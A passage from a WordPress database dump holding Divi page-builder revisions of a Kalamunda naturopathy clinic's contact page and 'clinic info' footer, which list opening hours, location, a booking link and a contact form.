header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2025-10-02 10:52:50','2025-10-02 02:52:50','',188,'https://verdenaturopathy.com.au/?p=492',0,'revision','',0),(493,1,'2025-10-02 10:52:55','2025-10-02 02:52:55','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#e6e5e1\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2025-10-02 10:52:55','2025-10-02 02:52:55','',188,'https://verdenaturopathy.com.au/?p=493',0,'revision','',0),(490,1,'2025-10-02 10:52:21','2025-10-02 02:52:21','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" min_height=\"0px\" custom_margin=\"||1px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" min_height=\"209.5px\" custom_padding=\"||38px|||\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"550px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 9am-4pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Wed: 9:30am-4pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 11am-7pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking) & Mead Medical, Kalamunda (Tuesday mornings only) </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#e6e5e1\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-10-02 10:52:21','2025-10-02 02:52:21','',26,'https://verdenaturopathy.com.au/?p=490',0,'revision','',0),(494,1,'2025-10-02 10:53:05','2025-10-02 02:53:05','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#e6e5e1\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2025-10-02 10:53:05','2025-10-02 02:53:05','',188,'https://verdenaturopathy.com.au/?p=494',0,'revision','',0),(495,1,'2025-10-02 10:53:07','2025-10-02 02:53:07','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" min_height=\"0px\" custom_margin=\"||1px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" min_height=\"209.5px\" custom_padding=\"||38px|||\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"550px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: 